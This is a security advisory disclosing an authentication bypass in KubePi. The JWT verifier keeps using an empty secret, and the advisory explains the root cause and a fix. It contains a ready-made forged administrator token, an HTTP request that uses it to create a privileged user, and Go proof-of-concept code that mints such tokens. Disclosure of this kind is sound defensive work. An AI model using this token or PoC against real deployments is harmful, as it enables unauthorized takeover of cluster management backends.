
JWT token validation has a defect

Moderate
wanghe-fit2cloud published GHSA-8q5r-cvcw-4wx7 Jul 25, 2024

Package

No package listed

Affected versions

>=v1.6.3 <=v1.7.0

Patched versions

v1.8.0

Description

Summary

KubePi's JWT token validation is defective. In the default configuration file the JWT secret is empty. Although the configuration-loading logic, on detecting an empty secret, generates a random 32-character string and writes it over the secret in the configuration file, the actual verification still uses the empty secret. A JWT token signed with an empty key therefore bypasses the login check and allows direct takeover of the management backend.

Details

1. Deploy the latest version of KubePi
sudo docker run --privileged -d --restart=unless-stopped -p 9982:80 1panel/kubepi

2. Generate a JWT token with an empty key:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfSwiaWF0IjoxNzE2NDQ3MDEyLCJleHAiOjE3MjI0NDcwMTJ9.dedNLwXZu0JY1sgGBCRZmpFvAnLdHjxdPmKWXA7LCf4

3. Use the generated token to create a user named tang

POST /kubepi/api/v1/users HTTP/1.1
Host: 127.0.0.1:9982
Content-Length: 248
sec-ch-ua: 
Accept: application/json, text/plain, */*
lang: zh-CN
Content-Type: application/json
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://127.0.0.1:9982
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:9982/kubepi/user-management/users/create
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfSwiaWF0IjoxNzE2NDQ3MDEyLCJleHAiOjE3MjI0NDcwMTJ9.dedNLwXZu0JY1sgGBCRZmpFvAnLdHjxdPmKWXA7LCf4
Connection: close

{"apiVersion":"v1","kind":"User","name":"tang","roles":["Common User","Manage Image Registries","Manage Clusters","Manage RBAC"],"nickName":"tang","email":"[email protected]","authenticate":{"password":"12345678@Tang"},"mfa":{"enable":false,"secret":""}}

4. Log in to the backend normally as the newly created user tang

PoC

package main

import (
	"fmt"
	"github.com/kataras/iris/v12/middleware/jwt"
	"time"
)

var jwtMaxAge = 100000 * time.Minute

type UserProfile struct {
	Name                string              `json:"name"`
	NickName            string              `json:"nickName"`
	Email               string              `json:"email"`
	Language            string              `json:"language"`
	ResourcePermissions map[string][]string `json:"resourcePermissions"`
	IsAdministrator     bool                `json:"isAdministrator"`
	Mfa                 Mfa                 `json:"mfa"`
}

type Mfa struct {
	Enable   bool   `json:"enable"`
	Secret   string `json:"secret"`
	Approved bool   `json:"approved"`
}

func main() {
	// Empty signing key: the same value the vulnerable verifier ends up using,
	// so a token signed here passes its signature check.
	jwtSigner := jwt.NewSigner(jwt.HS256, "", jwtMaxAge)
	test := map[string][]string{}
	// Claims shaped like the built-in admin profile.
	profile := UserProfile{
		Name:                "admin",
		NickName:            "Administrator",
		Email:               "[email protected]",
		Language:            "zh-CN",
		ResourcePermissions: test,
		IsAdministrator:     true,
		Mfa: Mfa{
			Secret:   "",
			Enable:   false,
			Approved: false,
		},
	}
	nonejwt, _ := jwtSigner.Sign(profile)
	fmt.Println(string(nonejwt))
}

Additional notes

The root cause is that, although an empty key in the configuration file is detected and a random 32-character string is generated and written over it, the call to jwt.NewVerifier does not use that generated key; it uses the empty string that was read from the default configuration file at startup as the JWT key. This is a logic defect. After the service is restarted it starts from the configuration file that now contains the random 32-character key, but any instance that has never been restarted is still running with the empty-string key.
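The following is an added example, not code from KubePi or from this advisory. It models the logic defect just described with the Go standard library instead of the iris jwt package: a configuration loader that detects an empty key and generates a replacement but hands the stale empty value to the verifier, beside a corrected loader and a verifier that fails closed on an empty key. The function names (vulnerableLoad, fixedLoad, hmacVerify, safeVerify) and the 32-hex-character key format are assumptions made for this example, and hmacVerify stands in for any library verifier that signs and checks with whatever key it is given.

```go
package main

import (
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"encoding/hex"
	"errors"
	"fmt"
	"strings"
)

// randomKey returns a 32-character hex string, matching the "random 32-character
// string" the advisory says is written back to the configuration file.
func randomKey() string {
	b := make([]byte, 16)
	if _, err := rand.Read(b); err != nil {
		panic(err)
	}
	return hex.EncodeToString(b)
}

// vulnerableLoad reproduces the defective pattern: the empty key is detected and a
// fresh key is "written to the file" (returned here as writtenKey), but the key
// returned for building the verifier is the original, still-empty value.
func vulnerableLoad(fileKey string) (verifierKey, writtenKey string) {
	writtenKey = fileKey
	if fileKey == "" {
		writtenKey = randomKey()
	}
	return fileKey, writtenKey // bug: should return writtenKey
}

// fixedLoad threads the regenerated key through to the verifier and refuses to
// start if, for any reason, the key is still empty.
func fixedLoad(fileKey string) (string, error) {
	key := fileKey
	if key == "" {
		key = randomKey()
	}
	if key == "" {
		return "", errors.New("refusing to start with an empty JWT key")
	}
	return key, nil
}

// signHS256 builds a compact HS256 JWS over claimsJSON (used for the round trip).
func signHS256(claimsJSON, key string) string {
	enc := base64.RawURLEncoding
	input := enc.EncodeToString([]byte(`{"alg":"HS256","typ":"JWT"}`)) + "." +
		enc.EncodeToString([]byte(claimsJSON))
	mac := hmac.New(sha256.New, []byte(key))
	mac.Write([]byte(input))
	return input + "." + enc.EncodeToString(mac.Sum(nil))
}

// hmacVerify models a library-style verifier: it checks the signature against
// whatever key it was handed. crypto/hmac accepts an empty key, so a verifier
// built from the stale empty key accepts any token minted with an empty key.
func hmacVerify(token, key string) bool {
	parts := strings.Split(token, ".")
	if len(parts) != 3 {
		return false
	}
	sig, err := base64.RawURLEncoding.DecodeString(parts[2])
	if err != nil {
		return false
	}
	mac := hmac.New(sha256.New, []byte(key))
	mac.Write([]byte(parts[0] + "." + parts[1]))
	return hmac.Equal(sig, mac.Sum(nil))
}

// safeVerify is the hardened wrapper: never verify with an empty key, and return
// the decoded claims only when the signature checks out.
func safeVerify(token, key string) (string, error) {
	if key == "" {
		return "", errors.New("refusing to verify with an empty JWT key")
	}
	if !hmacVerify(token, key) {
		return "", errors.New("invalid signature")
	}
	payload, err := base64.RawURLEncoding.DecodeString(strings.Split(token, ".")[1])
	if err != nil {
		return "", err
	}
	return string(payload), nil
}

func main() {
	vk, wk := vulnerableLoad("")
	fmt.Printf("vulnerable loader: verifier key=%q, key written to file=%q\n", vk, wk)
	fk, _ := fixedLoad("")
	fmt.Printf("fixed loader: verifier key=%q\n", fk)
}
```

The useful operational check is the one in safeVerify: whatever the configuration code does, the verifier should refuse to be constructed from an empty key, because that turns a configuration mistake into a silent authentication bypass rather than a startup failure.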

Impact

Improper validation

Severity

Moderate


CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
Low
Integrity
Low
Availability
Low

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

CVE ID

CVE-2024-36111

Weaknesses

No CWEs

Credits